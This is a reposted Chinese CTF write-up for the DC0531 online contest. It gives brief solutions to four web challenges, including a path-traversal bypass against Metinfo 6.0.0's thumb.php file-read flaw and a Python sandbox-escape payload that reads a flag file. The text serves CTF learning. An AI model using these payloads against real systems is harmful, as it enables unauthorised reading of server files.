DC0531 CTF 线上赛

栏目: 服务器 · 发布时间: 5年前

内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可

Web1

先关注公众号然后发现是个游戏。 测试发现 s:ip 这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露

DC0531 CTF 线上赛

通过分析可知,将武器切换为flag即可 DC0531 CTF 线上赛

然后一直s我们的vps

DC0531 CTF 线上赛 DC0531 CTF 线上赛

得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg 解密即可

Web2

题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/ 根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag DC0531 CTF 线上赛

Web3

首先输入 ().__class__.__base__.__subclasses__() 不可用

0x1.__class__.__base__.__subclasses__() 发现可用 DC0531 CTF 线上赛

0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag") 可以读到文件流

但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格

[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]

DC0531 CTF 线上赛

Web4

原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7


以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

The Nature of Code

The Nature of Code

Daniel Shiffman / The Nature of Code / 2012-12-13 / GBP 19.95

How can we capture the unpredictable evolutionary and emergent properties of nature in software? How can understanding the mathematical principles behind our physical world help us to create digital w......一起来看看 《The Nature of Code》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具